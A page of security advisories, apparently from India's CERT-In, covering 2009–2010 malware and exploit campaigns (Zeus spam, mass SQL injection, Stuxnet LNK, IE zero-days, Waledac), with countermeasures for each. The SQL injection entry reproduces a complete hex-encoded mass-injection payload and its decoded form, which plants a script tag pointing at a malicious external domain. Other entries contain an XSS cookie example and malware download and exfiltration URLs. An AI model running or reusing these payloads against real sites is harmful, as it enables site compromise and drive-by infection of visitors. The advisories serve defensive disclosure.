HOME > CURRENT ACTIVITIES


 CURRENT ACTIVITIES

Propagation of Zeus bot through spam campaign

Original issue date: August 16, 2010
Updated: August 26,2010

It has been observed that unsolicited spam mails carrying information stealer trojan " Zeus" is surging. The mail disguised as a birthday invitation, photos, or resume with a ZIP attachment arguably the latest Zbot variants. Detailed description of Zbot can be seen here .

Some of the subject lines of this spam are:

Beauty and the Geek 2
fill this Passport Form
First Birthday Invitation
In USA on August 15 and 16
Picture sizes
Resume & Coverletter - Feedback
Status
Employee Orientation
Your reservation is confirmed - Ref: 00338/058758
Garages
Picture sizes
Another candidate brought to you
Sales Dept

Excerpts of the Spam mail shot (source: Symantec)

It is also observed that the trojan uses the strange stories of celebrity death as the bait to infect the victim with malicious attachments.

The spammed messages has the following subject with a zipped attachment named “[hidden]Hot News.zip lines as seen in the shot below (Source: Symantec) with a convincing body to potentially lure the victim to open the attachment.

  • Beyonce Knowles died
  • Bon Jovi died
  • Brad Pitt died
  • Cameron Diaz died
  • David Beckham died
  • Gwen Stefani died
  • Jay-Z died
  • Jennifer Aniston died
  • Jennifer Lopez died
  • Johnny Depp died
  • Justin Timberlake died
  • Kanye West died
  • Miley Cyrus died etc....

Users are advised to implement the following countermeasures to protect themselves:

  • Do not follow unsolicited web links or attachments in email messages.
  • Keep up-to-date patches and fixes on the operating system and application software.
  • Keep up-to-date Antivirus and Antispyware signatures.
  • Do not visit untrusted websites.
  • Do not disclose any financial or personal information being asked in unsolicited email.

References

http://www.symantec.com/connect/blogs/spam-carrying-malicious-infostealer

http://www.symantec.com/connect/blogs/spam-carrying-malicious-infostealer

http://www.avertlabs.com/research/blog/index.php/2010/08/13/new
-wave-of-zbot-trojan/?utm_source=feedburner&utm_medium=
feed&utm_ campaign=Feed%3A+McafeeAvertLabsBlog+%28McAfee
+Avert+Labs+ Blog%29&utm_content=Google+Reader

http://www.cert-in.org.in/virus/Zeus_Botnet_Zbot.htm

http://www.itpro.co.uk/625912/timeline-three-years-of-zeus-terror

 

Massive SQL Injection Attacks

Original issue date: August 16, 2010

It has been observed that Mass SQL Injection attack spreading in the wild by injecting iframe into websites similar to the Asprox botnet methodology. The attack is designed to inject an iframe into the website source which will force visitors to download a javascript file from the domain malicious remote domains.

The injected SQL strings are obfuscated with HEX strings.

declare%20@s%20varchar(4000);set%20@s=cast(0x64456
34c417245204054207661526368615228323535292c4063207
64152434841722832353529206465634c417265207461624c4
55f635572734f5220435552534f5220466f522053454c45437
420412e6e616d652c622e6e614d652066726f4d207379734f6
26a6543747320612c737973434f4c754d4e732062207768655
24520612e69643d422e696420614e4420412e58745950653d2
7552720616e642028622e78545950653d3939206f7220622e5
8547970653d3335206f5220422e78545950653d323331204f5
220622e78747970453d31363729206f50454e205441624c655
f637552736f72206645544348206e6558542046524f6d20546
1426c455f437552734f7220494e744f2040542c40632077686
96c4528404046657443685f7374417475533d3029206265474
96e20657845632827557044615445205b272b40742b275d205
36554205b272b40632b275d3d727452494d28434f4e5665525
428564152434841722834303030292c5b272b40432b275d292
92b63615354283078334336393636373236313644363532303
73337323633334432323638373437343730334132463246364
53635364436463638373536393643363436393639364532453
73237353246373436343733324636373646324537303638373
03346373336393634334433313232323037373639363437343
63833443232333032323230363836353639363736383734334
43232333032323230373337343739364336353344323236343
63937333730364336313739334136453646364536353232334
53343324636393636373236313644363533452061532076615
2434861722831303629292729204645544368204e657874206
6526f6d207441426c655f635572734f7220496e744f2040742
c406320456e4420436c6f7365207461626c455f437552736f5
2206445414c4c6f43415465205461424c655f435552736f722
0%20as%20varchar(4000));exec(@s);--

The decoded strings can be normalized in a more readable form:

dEClarE @T Varchar(4000);

DEClare @c VarChar(255)

DeCLaRe tablE_CursOR cUrSOr foR foR

SELEcT [A].NAmE,[b].naME

fROM sYsoBJEcTs [A],sysColUMns [B]

WHeRE A.Id=b.Id ANd

a.xtyPe='U' /*table( User defined)*/ aNd

b.xtYpe=99 oR B.xtype=35 OR

b.xTypE=231 OR

B.XtypE=167

OPEn tABLe_CursoR feTCh NEXT fROm tAble_cUrsor INTO @t,@C

whIle(@@fETCh_StaTUs=0)

BEGIn

eXEc('UpdAte ['+@T+'] sET ['+@C+']=rTrim(conVERt(vaRCHar(4000),['+@c+']))+caSt(<script src
=http://nemohuildiin .ru /tds/go.php?sid=1>AS vaRCHaR(56))')

FETch NeXT fROm TabLE_CUrsoR INtO @t,@c

eND

clOse tABle_cUrsOR

DeaLLoCATe TABLe_CURsOr

The malicious domain is down as of now.

Many websites have been found infected with such scripts.

After successful exploitation malware such as downloaders' may Trojans are downloaded to the user's system.

In view of massive scale of the attack and high damage website administrators and users are advised to implement the following countermeasures

Website administrators:

  • Enable request validation by setting validateRequest=Truefalse in the Page directive or in the configuration section.
  • Input Filtering: Properly sanitize user input data.
  • Comment out malicious code: any scripting content to be “safely” commented out.
  • Avoid cross-site scripting appending in URLs by using some special character like #,etc http://www.vulnerable.site/welcome.html#name=<script>
    alert(document.cookie)<script>
  • Output Filtering: Filter user data when it is sent back to the user's browser.
  • Disable client side scripting.
  • Use Signed Scripting: Implement “signed scripting” such that any script with an invalid or un-trusted signature would not run automatically.
  • Microsoft has released an advisory on June 24, 2008 suggesting steps to mitigate the risk from SQL Injection attack on websites running ASP.Net. For details refer to Microsoft Advisory 954462 : http://www.microsoft.com/technet/security/advisory/
    954462.mspx
  • A free scanner named Scrawlr has been developed by Hewlett Packard which can identify whether sites are susceptible to SQL injection. This tool and support for its use can be found at:
    http://www.communities.hp.com/securitysoftware/blogs/
    spilabs/archive/2008/06/23/finding-sql-injection-with-scrawlr.
    aspx

System Administrators and Users:

  • Block access to domain nemohuildiin .ru and listed in Malware domain List
  • Disable Javascript and ActiveX scripting in the browser settings. Use NoScript extension with Firefox browser.
  • Keep up-to-date on patches and fixes on the OS and application software.
  • Install and maintain updated anti-virus software at gateway and desktop level
  • Exercise caution even while visiting trusted websites.

References

http://isc.sans.edu/diary.html?storyid=9397
http://www.cert-in.org.in/currentacts/currentact08.htm#SIW http://www.malwaredomains.com/wordpress/?p=1172

 

Exploitation of Microsoft windows Shell LNK parsing zero day vulnerability

Original issue date: July 19, 2010
Updated: July 26, 2010; August 03, 2010

It has been observed that a recently reported vulnerability in Microsoft Windows Shell is actively being exploited.

This issue is due to an error in the Windows Shell component when parsing shortcuts (*.LNK files), which could allow attackers to automatically execute a malicious binary by tricking a user into opening in Windows Explorer a removable drive (e.g. USB) or browsing a remote network or WebDAV share containing a specially crafted shortcut file.

A rootkit dubbed as Stuxnet is leveraging the said vulnerability with specially-crafted shortcut files ( Exploit:Win32/CplLnk.A ) placed on USB drives to automatically execute malware as soon as the .lnk file is read by the operating system.

The malicious code is contained in drivers that appear to be digitally signed by Realtek Semiconductor Corp, JMicron Technology Corp, which could help the code bypass controls that require drivers to be signed.

It is also reported as designed for monitoring activity on Siemens WinCC supervisory control and data acquisition (SCADA) systems- which are used to manage industrial machines used for manufacturing and power plants-and are appears as shipping with default administer credentials hardcoded into the system.

Once the system is infected, the malware seeks out for the presence of WinCC systems and if found, applies the hard-coded credentials, to access the control system's database.

It is also reported that other malware families are taking advantage of the .LNK vulnerability.

This includes newly discovered malware family Chymine a nd Vobfus. Apart from that the polymorphous trojan Sality and nasty banking trojan " Zues" are leveraging the said vulnerability. See the screenshot below sent by Zeus supposedly from "Security@microsoft.com" and the subject "Microsoft Windows Security Advisory.

Countermeasures :

  • Apply appropriate patches as mentioned in CERT-In Vulnerability Note CIVN-2010-169
  • Install and maintain updated anti-virus software at gateway and desktop level.
  • Use caution when opening attachments and accepting file transfers.
  • Sysclean - tool from Siemens to detect and remove malware from SCADA system. Download Update malware signature also.
  • Apply SIMATIC software Update .
  • Windows Shortcut Exploit Protection Tool from sophos Labs which can validate Microsoft shortcut files.
  • G-DATA LNK checker can check for malformed shortcut file

Removal Tools

Windows Shortcut Exploit Protection Tool from sophos Labs which can validate Microsoft shortcut files.

G-Data LNK checker can check for malformed shortcut files.

References

http://isc.sans.org/diary.html?storyid=9181
http://www.anti-virus.by/en/tempo.shtml
http://krebsonsecurity.com/2010/07/experts-warn-of-new-windows-
shortcut-flaw/
http://blog.eset.com/2010/07/17/windows-shellshocked-or-why-
win32stuxnet-sux
http://www.kb.cert.org/vuls/id/940193
http://www.f-secure.com/weblog/archives/00001986.html
http://www.f-secure.com/weblog/archives/00001987.html http://support.automation.siemens.com/WW/llisapi.dll?func=
cslib.csinfo&lang=en&objid=43876783&caller=view

Microsoft Help and Support Center zero-day exploit in the wild

Original issue date: June 17, 2010

It has been observed that a recently reported vulnerability in Microsoft Help and support center is actively being exploited.

This input validation vulnerability (described in CERT-In vulnerability note CIVN-2010-155 ) in the Help and Support Center application ( helpctr.exe )fails to sanitize hcp:// URIs, allows an unauthenticated remote attacker bypass the security restrictions and can execute arbitrary code with the privileges of the current user.

It is reported that Several websites are operational hosting malicious JavaScript's (detected as TROJ_HCPEXP.A , TrendMicro) that can exploit the said vulnerability.

The infection mechanism is depicted below(TrendMicro)

In the first case users are directed to a compromised website that download the malicious javascript exploit( Exploit:Win32/CVE-2010-1885.A ,Microsoft). Once successfully exploited ,drops an executable (TROJ_DROPPR.TEJ , TrendMicro) which further download malicious binaries including FAKE AVs.

figure: Exploit code Excerpts

Users are forced to download a .ASX file (Advanced Stream Redirector) which contains the link to the malicious binary file in the second case. The file contains a link which inturn downloads the binary.

Countermeasures :

  • Apply appropriate workarounds mentioned in Microsoft Security Advisory 2219475 or use automatic FIX IT tool.
  • Set Internet and Local intranet security zone settings to "High" to prompt before running ActiveX Controls and Active Scripting in these zones .
  • Configure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone
  • Update to the latest version IE8, Windows Media Player 10.
  • Do not browse un-trusted websites or follow un-trusted links.

References

http://www.sophos.com/blogs/sophoslabs/?p=10045

http://blog.trendmicro.com/microsoft-help-center-zero-day-
exploits-loose/

http://www.cert-in.org.in/vulnerability/civn-2010-155.htm

http://www.microsoft.com/technet/security/advisory/
2219475.mspx

http://isc.sans.org/diary.html?storyid=8995

http://www.microsoft.com/security/portal/Threat/Encyclopedia
/Entry.aspx?Name=Exploit%3aWin32%2fCVE-2010-1885.A

http://www.symantec.com/security_response/writeup.jsp?docid=
2010-061100-2532-99&tabid=2

Propagation of malware through Twitter Password reset notification

Original issue date: Junel 04, 2010
Updated: June 07, 2010


It has been observed that a new wave of spam e-mails purportedly arriving from Twitter is circulating widely. The spam mails posing as a Twitter password reset notification.

password notification mail

The embedded URI points to a compromised website ( gameroomhaven .com )which prompts the users to download a malicious executable password.exe, which actually a rouge Antivirus program Protection Center Safe Browser . Screenshot displays the rouge in action.

Updated:

Password notification mails posing as Twitter security model set up surging with zip attachment with subject Twitter <xxx-xx> as given in screenshot.The dodgy link point to a Google group "o[removed]exe .googlegroup.com" . Once the link is clicked, the user is prompted to download a malicious executable Twitter_security_model_setup.zip.

The malicious file downloads the "Protection Center" onto the computer. When it runs, it silently installs itself into the "ProgramFiles\Protection Center" folder. It also adds itself to the Start menu and places several files into the Temp folder, such as kernel64xp.dll, mscdexnt.exe, and wscsvc32.exe. See below the shots describing the activities of the rouge.

Virustotal has a fair detection :

Also it creates several icons on the desktop, several of which are links to porn sites, spam and trojan agents.

Users are advised to implement following countermeasures:

  • Exercise caution while clicking on any link embedded inside the e-mail message/Instant messages or web pages.
  • Install and maintain updated anti-virus software at Mail gateway and desktop level
  • Install and maintain updated anti-spyware software at desktop level
  • Refer Twitter Best Practices .
  • Refer the Trend micro's security tips for social networking users.

References

http://www.darknet.org.uk/2010/02/twitter-major-password-reset
-after-phishing-attack/
http://community.websense.com/blogs/securitylabs/archive/2010/
06/03/reset-your-twitter-password-spam.aspx
http://www.zdnet.com/blog/government/beware-twitter-password
-reset-messages/9050
http://isc.sans.org/diary.html?storyid=8137

McAfee VirusScan DAT Update leads Microsoft Windows System Failure

Original issue date: April 23, 2010
It has been reported that McAfee's malware definition update file 5958 DAT distributed to VirusScan has detected the windows genuine file svchost.exe as being infected with new variants in the Wecorl family of malware, (W32/Wecorl.a) and application has caused Blue screen or DCOM error, followed by shutdown messages like the following;

The affected system will enter a loop and loose all network access.

Workarounds

  • Boot into safe mode and replace the erroneous DAT file with EXTRA.DAT file and reboot To deploy through ePO(extra policy orchestrator) refer the articles
  • Remove the affected DAT file and restore to a previous version in safe mode.

Solutions

  • Restore svchost.exe with the Super DAT remediation Tool
  • Update to 5959 DAT or later (Unaffected users).

    Refer the following McAfee knowledge base article for detailed steps

  • Corporate users and administrators KB68780
  • Home users TS100969

Vendor Information

McAfee
https://kc.mcafee.com/corporate/index?page=content&id=KB68780

References

McAfee
http://service.mcafee.com/FAQDocument.aspx?lc=1033&id=TS100970
http://home.mcafee.com/VirusInfo/VirusProfile.aspx?key=265240
http://service.mcafee.com/faqdocument.aspx?id=TS100969
http://community.mcafee.com/thread/24056?tstart=0

ISC SANS
http://isc.sans.org/diary.html?storyid=8656

CISCO
http://tools.cisco.com/security/center/viewAlert.x?alertId=20375

US-CERT
http://www.us-cert.gov/current/index.html#mcafee_dat_5958_issues

 

0-day exploit for Internet Explorer in the wild
Date: March 12, 2010
Updated: March 30, 2010

It is reported that exploit for the zero -day vulnerability in Internet Explorer (IE6,IE7) described in CERT -In vulnerability note
CIVN-2010-66 is circulating in the wild which involves an invalid pointer reference by the iepeers.dll file that give supports for webfolders and print faculties in IE.

By convincing a user to view a specially crafted HTMLdocument (e.g., a web page or email message or attachment as shown below ) an attacker is able to execute arbitrary code with the privileges of the user .

( source: Sophos labs)

It is reported that Several websites are operational hosting obfuscated malicious JavaScript's (detected as Troj.Sykipot , Symantec) that can exploit the said vulnerability. Once the vulnerability is being exploited successfully, a remote server is requested ("top[removed]21century .com") and a malware "svohost.exe"with backdoor capabilities will be dropped.(detected as Backdoor.Sykipot ,Symantec)

Screenshot of exploit excerpts (source Symantec):

Apart from the Sykipot variants ,the below outlined malware are reported as get installed after successful exploitation
Trojan:Win32/Wisp

  • TrojanDropper:Win32/Lisiu
  • TrojanDropper:Win32/Agent.gen!I
  • TrojanDownloader:Win32/Small.gen!AZ
  • Backdoor:Win32/Agent.FS
  • TrojanDropper:Win32/Frethog

Countermeasures:

  • Set Internet and Local intranet security zone settings to "High" to prompt before running ActiveX Controls and Active Scripting in these zones
  • Configure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone
  • Enable DEP for Internet Explorer 6 Service Pack 2 or Internet Explorer. For detailed steps of these workarounds refer to Microsoft Security Advisory 981374
  • Update to the latest version IE8.
  • Do not browse un-trusted websites or follow un-trusted links.

References

http://www.cert-in.org.in/vulnerability/civn-2010-66.htm
http://www.microsoft.com/technet/security/advisory/981374.mspx
http://www.symantec.com/connect/blogs/zero-day-attack-ie6-
jssykipot-doesn-t-spare-retired-software
http://www.symantec.com/business/security_response/writeup.jsp?
docid=2010-031014-2034-99
http://tinyurl.com/y96e8o5 (CA blog)
http://www.microsoft.com/security/portal/Threat/
Encyclopedia/Entry.aspx?Name=Trojan%3aWin32%2fWisp.B
http://www.microsoft.com/security/portal/Threat/
Encyclopedia/Entry.aspx?Name=Trojan%3aWin32%2fWisp.A
http://www.microsoft.com/security/portal/Threat/
Encyclopedia/Entry.aspx?Name=Exploit%3aJS%2f
CVE-2010-0806

Fake CDC H1N1 Vaccination malware Spam
Date: December 08, 2009

It has been reported that a spam campaign claiming to be from the Center for Disease Control and Prevention (CDC) and requesting that recipients complete a "Personal H1N1 Vaccination Profile" is in the wild distributing Zbot variants.

Screenshot of the spam mail (source: McAfee)

These emails contain a url that points to a dodgy CDC website which urges the victim to download an archive that contains the instructions for creating Personal H1N1 Vaccination Profile

Fake website (Source: McAfee)

Some of the subject lines of this spam are:

  • Governmental registration program on the H1N1 vaccination
  • State Vaccination H1N1 Program
  • Your personal Vaccination Profile
  • Create your personal Vaccination Profile
  • State Vaccination Program
  • Creation of personal Vaccination Profile
  • Instructions on creation of your personal Vaccination Profile
  • Creation of your personal Vaccination Profile

Users are advised to take the following precautions to protect themselves:

  • Do not follow unsolicited web links or attachments in email messages.
  • Keep up-to-date patches and fixes on the operating system and application software.
  • Keep up-to-date Antivirus and Antispyware signatures.
  • Do not visit untrusted websites.

References

http://www.avertlabs.com/research/blog/index.php/2009/12/01/
h1n1-vaccination-profile-a-path-to-infection/
http://community.ca.com/blogs/securityadvisor/archive/2009/12/01/
zbot-s-launching-of-state-quot-vaccination-quot-h1n1-program.aspx
http://www.cdc.gov/hoaxes_rumors.html
http://antivirus.about.com/od/virusdescriptions/p/cdch1n1scam.htm
http://blogs.technet.com/mmpc/archive/2009/11/27/do-and-don-ts-for-
p-w0rd.aspx

 

Propagation of malware through spam impersonating System/Mail Administrator
Date: October 16, 2009
Updated: October 20, 2009

It has been observed that a new wave of spam e-mails purportedly arriving from the organisations System/Mail Administrators /tech-support team is circulating widely.

These " highly personalized " spam mails alert users to update/upgrade system software due to a recent server upgrade and includes an URL or ZIP attachment. It urges the users to click the URL or open attached ZIP file, and execute for updation. Some of the attached/downloaded malware are detected as ZBot /Cutwail variants.

This email message spoofs the sender email address so that the sender looks like "tech-admin /support @organisation-domain -name" and the links are having the format

http:||updates.organisation-domain.secure.some-domain mail|id=<10digitID>-legitimateemail@ organisation-domain .com -patch407574.exe

To make it more convincing, the victim's domain name is used as the sub-domain and used throughout the message body along with the victim's e-mail address.

See below some of the screen shots of the malicious spam.

 



Screenshot of the malicious page redirected: (Source: Websense Securitylab)

It is also observed that mails pretends to be coming from Microsoft asking the users to install the attached antispyware program to evade away from the resurfaced Conficker Worm which started from 18/10/2009.

Screenshot of the malicious spam mail:

Some of the domains reported with the malicious campaign are given below:

Users are advised to implement following countermeasures:

•  Block the emails with above mentioned subject lines at Mail Gateway
•  Exercise caution while clicking on any link embedded inside the e-mail message/Instant messages or web pages.
•  Install and maintain updated anti-virus software at Mail gateway and desktop level
•  Install and maintain updated anti-spyware software at desktop level
•  Keep up-to-date on patches and fixes on the OS and application software

References

http://securitylabs.websense.com/content/Alerts/3491.aspx http://blog.trendmicro.com/tailor-made-zbot-spam-campaign-targets-
various-companies/
http://isc.sans.org/diary.html?storyid=7333 http://isc.sans.org/diary.html?storyid=7357 http://www.symantec.com/connect/blogs/personalized-patchupdate-spam-delivering-malware

 


Series of Mass iframe Injection on Websites-Serving Blended Malware
Date : Augest 28, 2009

It has been observed that a number of websites have been compromised and infected with iframe script tags pointing to malicious JavaScript file
"x.js", hosted on domain "a0v[d0t]org". Remote attackers launched successful attacks on the web servers running ASP and inserted iframe script tag "script src=http://a0v[d0t]org/x[d0t]js" into the web pages.

When a user visits any of the infected websites, the script gets executed on visitors computer system without user's intervention. Upon execution it tries to connect to some more malicious domains hardcoded in the JavaScript files & HTML pages, then download and install desegregated malware consisting of trojans, backdoors, keyloggers, password stealers & downloaders onto the visitors computer system. These malware are
downloaded from different domains. A Case study describing the malicious redirection mechanism can be found here (CERT-In Case Study CICS-2009-01).

A snapshot of malicious webpage is shown below:


A list of the malicious files getting downloaded on visitors system are as follows:

a.jpg, x3.swf, 16.js, 9.exe, 19.exe, 29.exe, b.jpg, x4.swf, x115.css, 10.exe, 20.exe, 30.exe, url.jpg, x5.swf, 1.exe, 11.exe, 21.exe, 31.exe
c.jpg, t2.htm, 2.exe, 12.exe, 22.exe, 32.exe, d.jpg, of.htm, 3.exe, 13.exe, 23.exe, 33.exe, e.jpg, of.css, 4.exe, 14.exe, 24.exe, YTPPSeee.vbs, f.jpg, of.js, 5.exe, 15.exe, 25.exe, YTPPSeee.pif,
swfobject.js, ytfl.htm, 6.exe, 16.exe, 26.exe, x1.swf, 14.js, 7.exe, 17.exe, 27.exe, x2.swf, 15.js, 8.exe, 18.exe, 28.exe.


Some of the malicious domains involved are as follows:
[Do not visit these domain, this may harm your computer,
replace " [d0t] " with "." for domain name.]

a0v [d0t] org, d.bgsew [d0t] com, txt.bhssd [d0t] com,
js.tongji.linezing [d0t] com, yea24.2288 [d0t] org,
ds3gj [d0t] cn, 1.boksx [d0t] com, 2.boksx [d0t] com,
3.boksx [d0t] com.

It has been found that most of the files downloaded are trojan download agents, trojan dropper, online gaming password stealers, keyloggers, rootkit and backdoor trojans. Most of the dropped malwares are known malware and detection is available with most of the antivirus vendors. It may be noted that many such malicious domains could be hosted and new wave of iFrame injections could be launched to redirect users to these malicious websites hosted on a Botnet.

Countermeasures:

  • Disable client side scripting.
  • Disable Javascript and ActiveX scripting in the browser settings.
  • Use NoScript extension with Firefox browser.
  • Use Signed Scripting: Implement “signed scripting” such that
    any script with an invalid or un-trusted signature would not
    run automatically.
  • Enterprises shall implement IPS and Security solutions with
    content inspection at perimeter level.
  • Keep up-to-date on patches and fixes on the OS and application
    software.
  • Install and maintain updated anti-virus software at desktop level.
  • Exercise caution even while visiting trusted websites.
  • Secure the web applications against SQL injection and XSS attacks.
  • For more details refer CERT-In Case Study and Whitepaper on SQL injection Techniques & Countermeasures.

References

http://www.securityfocus.com/brief/1001
http://blog.scansafe.com/journal/2009/8/21/up-to-55k- compromised-by-potent-backdoordata-theft-cocktail.html
http://news.softpedia.com/news/Over-62-000-New-URLs- Serving-Exploits-Cocktail-120006.shtml
http://www.theregister.co.uk/2009/08/24/mass_web_infection/
http://www.cert-in.org.in/knowledgebase/whitepapers/CICS-2009-01.pdf


Microsoft Office web components ActiveX exploit
Date : July 16, 2009

It is reported that an exploit for the zero -day vulnerability in Microsoft Office web components described in CERT -In vulnerability note
CIVN 2009 -83 is being reported.
This vulnerability is due to a memory corruption error in the Office Web Components ActiveX Controls (OWC10.dll and OWC11.dll).

Microsoft Office Web Components are a collection of Component Object Model (COM) controls for publishing spreadsheets, charts, and databases to the Web, and for viewing the published components on the Web.

Once successfully exploited, an attacker can execute arbitrary code in a "browse and get owned" scenario with the privilege of the user.

It is reported that Several websites are operational -which uses script fragmentation wherein the whole malicious script is fragmented and hosted in several websites- hosting malicious JavaScript's detected as JS_SHELLCODE.BH (Trend Micro)

A screenshot of the shell code (Source: Trend Micro)


It connects to the following Web site to download and execute a malicious file:
http://{BLOCKED}nf5.com/889/123/1.exe - (TROJ_DLOADER.DOF Trend Micro)

It has been reported that this vulnerability is being used for targeted attacks with crafted Office documents with embedded HTML.

Countermeasures:

  • Apply appropriate workarounds as mentioned in CERT-In vulnerability note CIVN-2009-83.
  • Block access to the exploit domains listed here at the perimeter.
  • Configure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone
  • Do not open or save Microsoft Office Documents received from unknown and untrusted sources.

References

http://www.microsoft.com/technet/security/advisory/
973472.mspx
http://support.microsoft.com/kb/973472
http://blogs.technet.com/srd/archive/2009/07/13/more
-information-about-the-office-web-components-activex-
vulnerability.aspx
http://www.cert-in.org.in/vulnerability/civn-2009-83.htm
http://blogs.technet.com/srd/archive/2008/02/03/activex
-ontrols.aspx
http://blog.trendmicro.com/ocw-activex-exploit-follows
-mpeg2tunerequest%E2%80%99s-lead/
http://www.dslreports.com/forum/r21469081-Script-fragmentation
-attacks-to-bypass-antivirus-protection
http://isc.sans.org/diary.html?storyid=6778
http://threatinfo.trendmicro.com/vinfo/virusencyclo/default5.asp?
VName=JS_SHELLCODE.BH
http://threatinfo.trendmicro.com/vinfo/virusencyclo/default5.asp?
VName=TROJ_DLOADER.DOF


Fake Microsoft "critical update" spam propagating trojan
Date : June 23, 2009

It has been observed that malicious files are being propagated through fraudulent websites pretending to be providing critical updates to Microsoft Windows Outlook/Outlook Express.

The spam mails come with subject line “ Microsoft Outlook critical update. When a user clicks on the links provided in the spam mail it takes users to malicious websites hosting variants of ZBOT, an information stealing trojan. A sample email is shown in the following screenshot: (SOURCE: Trend Micro).


Upon execution of ZBOT trojan the affected system connects to a website (http://{BLOCKED}i.com/lbrc/lbr.bin) to download a .bin file with information referring to download the updated variants of the trojan and send the stolen data to a particular website .The stolen data is sent to the website ( http://{BLOCKED}i.com/lbr/rec.php) via HTTP POST method. This configuration file also contains the list of websites for which it captures keystokes/data, whenever the user visit these websites.

Users are advised to implement following countermeasures:

  • Do not click upon any link embedded inside the untrusted e-mail messages or web pages.
  • Install and maintain updated anti-virus software at gateway and desktop level.
  • Install and maintain updated anti-spyware software at desktop level.
  • Keep up-to-date on patches and fixes on the OS and application software.
  • Follow the guidance provided by Microsoft regarding Recognize and avoid fraudulent e-mail to Microsoft customers.

References

http://blog.trendmicro.com/critical-update-leads-to
-critical-info-theft/
http://threatinfo.trendmicro.com/vinfo/virusencyclo/
default5.asp?VName=TROJ_ZBOT.BTS&VSect=T
http://www.sophos.com/blogs/sophoslabs/v/post/4889
http://www.securecomputing.net.au/News/148325,fake
-microsoft-critical-update-spam-propagating-trojan.aspx


Email scams circulating related to the Swine Flu
Date : May 01, 2009

It has been reported that malicious users are taking advantage of the recent Swine Flu outbreak by distributing unsolicited emails with swine-flu-themed subjects. The attacks arrive through an unsolicited email message typically containing a subject line related to the Swine Flu. These email messages may contain a link or an attachment. If users click on this link or open the attachment, they may be directed to a phishing website or infected with malicious code.

It has been reported that a document titled "Swine influenza frequently asked questions.pdf" is circulating on the internet as an email
attachment and being used to drop malware on computers. This malicious PDF file, known as Bloodhound.Exploit.6, takes advantage of a vulnerability in Adobe to drop a malicious "infostealer" Trojan on the user's computer, which is used to steal personal information, such as credit card number, online bank credentials etc.

Some of the subject lines of this spam are:

•  First US swine flu victims!
•  Madonna caught swine flu!
•  NY victims of swine flu
•  Salma Hayek caught swine flu!
•  Swine flu in Hollywood !
•  Swine flu in USA
•  Swine flu worldwide!
•  US swine flu statistics.

The body of the message is a short sentence followed by a link.

It appears that dozens of new web site names with the term "swineflu" included in them were registered during the last few days. Right now they are not used for anything, but it is anticipated that at some point, these sites may be used for spamming purposes, perhaps advertisements or even greater malicious use.

Users are advised to implement the following countermeasures to protect themselves:

•  Do not follow unsolicited web links or attachments in
email messages.
•  Keep up-to-date patches and fixes on the operating system and application software.
•  Keep up-to-date Antivirus and Antispyware signatures. •  Do not visit untrusted websites.
•  Do not disclose any financial or personal information
being asked in unsolicited email.

References

http://www.avertlabs.com/research/blog/index.php
/2009/04/27/swine-flue-spam/
http://www.us-cert.gov/current/index.html#
swine_flu_phishing_attacks_and
http://www.theregister.co.uk/2009/04/29/
swine_flu_spam/
http://www.cbc.ca/technology/story/2009/04/29/
tech-090429-swine-flu-spam.html
http://voices.washingtonpost.com/securityfix/2009/04/
scammers_spammers_embrace_swin.html?wprss=securityfix


Exploit for Internet Explorer Memory corruption vulnerability in the wild
Date : February 19, 2009



It has been observed that an exploit targeting Microsoft Internet Explorer memory Corruption vulnerability (MS09-002) is in the wild. Further details of the vulnerability are available in CERT -In vulnerability CIVN-2009-23.

The vulnerability is due to a memory corruption error when Internet Explorer handles errors that could occur when calls are made to un-initialized or deleted memory objects. Successfully exploiting this vulnerability may give an attacker to execute remote code on the victim system and harvest sensitive, personal information from an infected machine.

It is reported that the exploit propagates in the form of a crafted word document (XML_DLOADER.A, Trend Micro). This word document contains an embedded ActiveX control which upon opening, connects to a website to launch and execute MS09-002 exploit (HTML_DLOADER.AS,Trend Micro).
On successful exploitation the exploit drops a backdoor detected as BKDR_AGENT.XZMS

This backdoor changes the system configuration and installs a .DLL file that has information stealing capabilities and sends the stolen information to another URL via port 443. It takes screenshots of the infected system and sends these screenshots to a remote location. It also creates a hidden Internet Explorer window which connects to a website to listen for commands.

Countermeasures:

  • Apply appropriate patches as mentioned in Microsoft Security Bulletin MS09-002
  • Do not open or save Microsoft Office files that received from untrusted sources or that received unexpectedly from trusted sources.
  • Install and maintain updated anti-virus software at gateway and desktop level.
  • Install and maintain Firewall at Desktop level.
  • Do not follow unsolicited links to URLs.
  • Set Internet Explorer security setting to “High” to prompt before running ActiveX controls and Active scripting.

References

http://www.microsoft.com/technet/security/bulletin/MS09-002.mspx
http://isc.sans.org/diary.html?storyid=5884
http://blog.trendmicro.com/another-exploit-targets-ie7-bug/
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?
VName=BKDR_AGENT.XZMS&VSect=T
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?
VName=HTML_DLOADER.AS
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=
XML_DLOADER.A
http://www.f-secure.com/weblog/
http://vil.nai.com/vil/content/v_154088.htm
http://www.avertlabs.com/research/blog/index.php/2009/02/17/
ms09-002-exploit-in-the-wild-uses-msword-lure/


Waledac worm variants Propagating
Date : February 10, 2009; March 17, 2009
Updated : April 17, 2009; July 06, 2009;



It has been observed that ‘Win32/Waledac Worm’ is circulating via spam e-mails pretending to be Valentine’s Day Greetings to deceive users to download the greeting card or the attached file.

These spam e-mails comes with the subject line such as “short and sweet”, “Me and You”,” In Your Arms”,” With all my love” and other Valentine’s Day related phrases. E-mail contains URL which takes to the user to malicious fast flux websites hosting malware “youandme.exe", "onlyyou.exe", "you.exe", and "meandyou.exe",, start.exe” and so on.
The spam mail looks like (Source: McAfee)

Upon clicking the link users are lead to WebPages as depicted below (Source:McAfee)

When the page is clicked, the user is prompted to download a file dubbed as WORM_WALEDAC.AR( Trend Micro)

It is also observed that spam mails related to Terror attack with subject lines “Why did they explode bomb there?” or “Why did it happen in your city?” is circulating.

A spam mail is given below

Upon clicking the link users are directed to a fake website depicted below which presents a video from Reuters and prompts for the users to download flash player to view the video which is a Waledac variant.

It is observed recently that spam mails enticing the user to download an application that will permit them to view other people's SMS messages online. The download file uses alternating filenames, sms.exe, trial.exe, smstrap.exe, freetrial.exe and smsreader.exe.

Screenshot of a spammed email Example:

Screenshot of the malicious SMS Spy theme Web site template:

Updated: July 06, 2009:

